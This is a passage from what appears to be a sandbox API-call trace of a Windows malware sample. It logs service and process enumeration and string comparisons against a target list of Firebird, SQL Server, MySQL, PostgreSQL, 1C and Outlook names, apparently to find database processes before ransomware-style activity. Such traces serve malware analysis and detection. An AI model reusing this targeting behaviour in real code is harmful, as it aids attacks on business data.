pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0051.329] CloseHandle (hObject=0x190) returned 1 [0051.329] Sleep (dwMilliseconds=0x1f4) [0051.999] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680490 [0052.000] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0052.000] GetLastError () returned 0xea [0052.000] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0052.000] EnumServicesStatusExW (in: hSCManager=0x680490, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0052.001] CloseServiceHandle (hSCObject=0x680490) returned 1 [0052.001] lstrlenW (lpString="Appinfo") returned 7 [0052.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0052.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0052.001] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0052.001] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0052.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0052.001] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0052.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0052.001] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0052.001] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0052.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0052.001] lstrlenW (lpString="AudioSrv") returned 8 [0052.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0052.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0052.001] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0052.001] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0052.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0052.001] lstrlenW (lpString="BFE") returned 3 [0052.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0052.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0052.001] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0052.002] lstrlenW (lpString="CryptSvc") returned 8 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0052.002] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0052.002] lstrlenW (lpString="CscService") returned 10 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0052.002] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0052.002] lstrlenW (lpString="DcomLaunch") returned 10 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0052.002] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0052.002] lstrlenW (lpString="Dhcp") returned 4 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0052.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0052.002] lstrlenW (lpString="Dnscache") returned 8 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0052.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0052.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0052.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0052.002] lstrlenW (lpString="DPS") returned 3 [0052.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0052.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.003] lstrlenW (lpString="eventlog") returned 8 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0052.003] lstrlenW (lpString="EventSystem") returned 11 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.003] lstrlenW (lpString="gpsvc") returned 5 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.003] lstrlenW (lpString="iphlpsvc") returned 8 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.003] lstrlenW (lpString="LanmanServer") returned 12 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.003] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.003] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.003] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.004] lstrlenW (lpString="lmhosts") returned 7 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.004] lstrlenW (lpString="MMCSS") returned 5 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0052.004] lstrlenW (lpString="MpsSvc") returned 6 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.004] lstrlenW (lpString="Netman") returned 6 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0052.004] lstrlenW (lpString="netprofm") returned 8 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.004] lstrlenW (lpString="NlaSvc") returned 6 [0052.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.004] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.004] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.005] lstrlenW (lpString="nsi") returned 3 [0052.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.005] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.005] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.005] lstrlenW (lpString="PcaSvc") returned 6 [0052.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.005] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.005] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.005] lstrlenW (lpString="PlugPlay") returned 8 [0052.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.005] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.005] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.006] lstrlenW (lpString="Power") returned 5 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.006] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.006] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.006] lstrlenW (lpString="ProfSvc") returned 7 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.006] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.006] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.006] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.006] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.006] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.006] lstrlenW (lpString="RpcSs") returned 5 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.006] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.006] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.006] lstrlenW (lpString="SamSs") returned 5 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.006] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.006] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.006] lstrlenW (lpString="Schedule") returned 8 [0052.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.007] lstrlenW (lpString="SENS") returned 4 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.007] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.007] lstrlenW (lpString="Spooler") returned 7 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.007] lstrlenW (lpString="swprv") returned 5 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0052.007] lstrlenW (lpString="SysMain") returned 7 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.007] lstrlenW (lpString="Themes") returned 6 [0052.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0052.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0052.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0052.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0052.008] lstrlenW (lpString="TrkWks") returned 6 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0052.008] lstrlenW (lpString="UxSms") returned 5 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0052.008] lstrlenW (lpString="VSS") returned 3 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0052.008] lstrlenW (lpString="WdiServiceHost") returned 14 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0052.008] lstrlenW (lpString="WdiSystemHost") returned 13 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0052.008] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0052.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0052.008] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0052.008] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0052.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0052.009] lstrlenW (lpString="Winmgmt") returned 7 [0052.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0052.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0052.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0052.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0052.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0052.009] lstrlenW (lpString="WPDBusEnum") returned 10 [0052.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0052.009] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0052.009] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0052.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0052.009] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0052.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x200 [0052.011] Process32FirstW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.011] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.012] lstrlenW (lpString="System") returned 6 [0052.012] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0052.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0052.012] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.013] lstrlenW (lpString="smss.exe") returned 8 [0052.013] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0052.013] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0052.013] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.014] lstrlenW (lpString="csrss.exe") returned 9 [0052.014] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0052.014] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0052.014] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0052.014] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0052.014] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0052.014] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0052.014] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0052.014] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.015] lstrlenW (lpString="wininit.exe") returned 11 [0052.015] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0052.015] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0052.015] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0052.015] Process32NextW (in: hSnapshot=0x200, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.015] lstrlenW 